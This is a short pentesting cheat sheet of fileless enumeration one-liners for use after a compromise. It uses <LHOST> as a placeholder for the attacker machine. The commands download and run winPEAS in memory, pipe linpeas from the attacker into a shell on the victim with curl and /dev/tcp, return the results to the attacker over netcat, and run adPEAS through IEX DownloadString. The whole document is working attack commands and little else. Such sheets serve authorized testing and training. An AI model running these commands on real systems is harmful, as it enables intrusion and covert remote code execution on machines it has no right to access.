% enumeration

# download + execute winPEASany from memory in PowerShell
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("<OPTIONAL_PARAM>")

# fileless linpeas curl
sudo systemctl start apache2
curl <LHOST>/lin/linpeas.sh | sh #Victim

# fileless linpeas nc
sudo nc -q 5 -lvnp 80 < linpeas.sh
cat < /dev/tcp/<LHOST>/80 | sh #Victim

# fileless linpeas send back
sudo systemctl start apache2
nc -lvnp 9002 | tee linpeas.out
curl <LHOST>/lin/linpeas.sh | sh | nc <LHOST> 9002 #Victim

# read linpeas output with colors
less -r linpeas.out

# adPEAS
IEX(New-Object Net.WebClient).DownloadString("http://<LHOST>/win/adPEAS.ps1"); Invoke-adPEAS

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
